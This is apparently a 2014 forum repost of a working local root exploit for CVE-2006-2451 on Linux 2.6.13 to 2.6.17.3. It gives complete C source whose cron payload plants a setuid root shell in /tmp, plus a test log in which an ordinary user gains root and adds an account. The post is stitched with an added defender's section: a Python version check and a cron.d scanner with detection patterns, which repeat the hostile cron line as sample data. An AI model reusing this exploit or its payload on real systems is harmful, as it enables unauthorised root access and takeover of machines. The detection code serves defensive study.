Linux Kernel 2.6.x local overflow code: tested it today, works well

火星人 @ 2014-03-09, reply:0


    /*****************************************************/
    /* Local r00t Exploit for: */
    /* Linux Kernel PRCTL Core Dump Handling */
    /* ( BID 18874 / CVE-2006-2451 ) */
    /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
    /* By: */
    /* - dreyer <luna@aditel.org> (main PoC code) */
    /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
    /* [ 10.Jul.2006 ] */
    /*****************************************************/
    #include <stdio.h>
    #include <sys/time.h>
    #include <sys/resource.h>
    #include <unistd.h>
    #include <linux/prctl.h>
    #include <sys/prctl.h>   /* declares prctl(); the posted code relied on an implicit declaration */
    #include <stdlib.h>
    #include <sys/types.h>
    #include <signal.h>

    /* Text that cron will find inside the core file once it lands in /etc/cron.d:
     * a crontab fragment that copies /bin/sh to /tmp, makes it setuid root and
     * removes the evidence. (The forum copy had lost the backslashes of the \n escapes.) */
    char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

    int main() {
        int child;
        struct rlimit corelimit;

        printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
        printf("By: dreyer & RoMaNSoFt\n");
        printf("[ 10.Jul.2006 ]\n\n");

        /* Allow an unlimited core dump so the child's dump is actually written. */
        corelimit.rlim_cur = RLIM_INFINITY;
        corelimit.rlim_max = RLIM_INFINITY;
        setrlimit(RLIMIT_CORE, &corelimit);

        printf("[*] Creating Cron entry\n");
        if ( !( child = fork() )) {
            /* Child: move into /etc/cron.d and mark itself dumpable with mode 2
             * (the unprivileged use of this mode is the bug fixed in 2.6.17.4),
             * then wait to be killed so the core is dumped there. */
            chdir("/etc/cron.d");
            prctl(PR_SET_DUMPABLE, 2);
            sleep(200);
            exit(1);
        }
        kill(child, SIGSEGV);

        printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
        sleep(62);
        printf("[*] Running shell (remember to remove /tmp/sh when finished) \n");
        system("/tmp/sh -p");
    }
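A defender's counterpart to the code above, added here and not part of the original post or the exploit authors' work: a Python check for whether a kernel release string falls inside the affected window named in the header (>= 2.6.13 and < 2.6.17.4), plus a scan of raw cron.d file content for the artifact this technique leaves behind (a core dump dropped in /etc/cron.d that carries a cron line planting a setuid shell in /tmp). The sample cron.d bytes are constructed for the example.

```python
import os
import re

# Affected window from the exploit header: >= 2.6.13 and < 2.6.17.4.
VULN_MIN = (2, 6, 13)
VULN_FIX = (2, 6, 17, 4)

def parse_release(release):
    """'2.6.15-1.2054_FC5' -> (2, 6, 15): keep only the leading dotted numeric part."""
    m = re.match(r"(\d+(?:\.\d+)*)", release)
    if not m:
        raise ValueError("unparseable kernel release: %r" % release)
    return tuple(int(x) for x in m.group(1).split("."))

def kernel_vulnerable(release):
    """True if the release lies in [2.6.13, 2.6.17.4); tuple order handles short versions."""
    return VULN_MIN <= parse_release(release) < VULN_FIX

# Cron commands that set a setuid bit or copy a shell into /tmp.
SUSPICIOUS = re.compile(rb"chmod\s+[ug]?\+s|chmod\s+[4-7][0-7]{3}\b|cp\s+/bin/(ba)?sh\s+/tmp/")

def suspicious_cron_lines(data):
    """Report why a cron.d file (raw bytes) looks like a smuggled core dump.
    A genuine cron.d file is plain text; a core dump carries NUL bytes with the
    payload lines embedded, so both the binary content and the lines are flagged."""
    findings = []
    if b"\x00" in data:
        findings.append("binary content in cron.d file (core dump?)")
    for line in data.splitlines():
        if SUSPICIOUS.search(line):
            findings.append(line.decode("latin-1"))
    return findings

# Constructed sample: roughly what the post's core file looks like inside /etc/cron.d.
SAMPLE_CORE = (b"\x7fELF\x00\x00...core dump bytes...\x00"
               b"\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/bin\n"
               b"* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n")

if __name__ == "__main__":
    release = os.uname().release
    print("kernel %s in affected window: %s" % (release, kernel_vulnerable(release)))
    print(suspicious_cron_lines(SAMPLE_CORE))
```

Run against a live box, point suspicious_cron_lines() at each file under /etc/cron.d and also look for setuid-root files in /tmp, which is what the posted payload leaves behind.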

Test run:

[fred@fedora ~]$ uname -a
Linux fedora 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[fred@fedora ~]$ id
uid=500(fred) gid=500(fred) groups=500(fred)
[fred@fedora ~]$ ls
amsn_received Desktop linux.bin pics rs_prctl_kernel.c vmware
[fred@fedora ~]$ gcc -o rs_prctl_kernel rs_prctl_kernel.c
[fred@fedora ~]$ ls
amsn_received Desktop linux.bin pics rs_prctl_kernel rs_prctl_kernel.c vmware
[fred@fedora ~]$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

Creating Cron entry

Sleeping for aprox. one minute (** please wait **)

Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# whoami
root
sh-3.1# id
uid=500(fred) gid=500(fred) euid=0(root) groups=500(fred)
sh-3.1# /usr/sbin/useradd test


sh-3.1# exit
exit

http://www.coctec.com/docs/linux/show-post-51462.html